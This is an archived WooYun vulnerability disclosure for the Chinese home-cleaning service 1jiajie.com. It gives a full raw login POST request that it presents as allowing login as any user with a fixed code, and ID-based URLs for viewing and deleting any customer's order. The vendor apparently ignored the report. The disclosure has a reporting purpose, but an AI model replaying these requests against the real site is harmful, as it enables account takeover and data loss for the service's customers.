当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147938

漏洞标题:E家洁某处设计不当导致任意用户登录

相关厂商:1jiajie.com

漏洞作者: Hancock

提交时间:2015-10-20 10:13

修复时间:2015-10-25 10:14

公开时间:2015-10-25 10:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

E家洁某处设计不当导致 任意用户登录

详细说明:

微信公众号:

POST /doLogin.php HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://m.1jiajie.com/login.php?from=wx&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025469 Mobile Safari/533.1 MicroMessenger/6.2.5.54_re87237d.622 NetType/WIFI Language/zh_CN
Origin: http://m.1jiajie.com
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: m.1jiajie.com
Cookie: Hm_lpvt_2fe9165c0d54a831546cc00eecdb0026=1445283698; Hm_lpvt_3163173ca7cc1075e84e6a692b711f3d=1445283698; Hm_lvt_2fe9165c0d54a831546cc00eecdb0026=1445283304,1445283697; Hm_lvt_3163173ca7cc1075e84e6a692b711f3d=1445283304,1445283698; PHPSESSID=0ckn82udq71jdm2l5h3n2rprb0; address0=; address1=; bd_st=%28%7B%22s%22%3A1445283754058%2C%22r%22%3A%22php%3Ffrom%3Dwx%26weixin_id%3Do7KvajnDlhdcL55L3CNAUepawQC4%22%7D%29; city_name=%E5%8C%97%E4%BA%AC; order_place_detail=; order_street=; wx_from=wx
Content-Length: 105
user_phone=18888888888&user_code=1234&login_type=0&weixin_id=o7KvajnDlhdcL55L3CNAUepawQC4&wx_qr_code_id=0


0.jpg


Screenshot_2015-10-20-03-52-13.png


pc端也存在,方法和上面一样:

https://mm.1jiajie.com/index.php


任意订单浏览:

https://mm.1jiajie.com/orderDetails.php?order_id=123&platform_version=wap3.0&type=order_details


2.jpg


任意订单删除:

https://mm.1jiajie.com/dmyOrder.php?order_id=123&platform_version=wap3.0&type=delete_order


漏洞证明:

修复方案:

:P

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-25 10:14

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无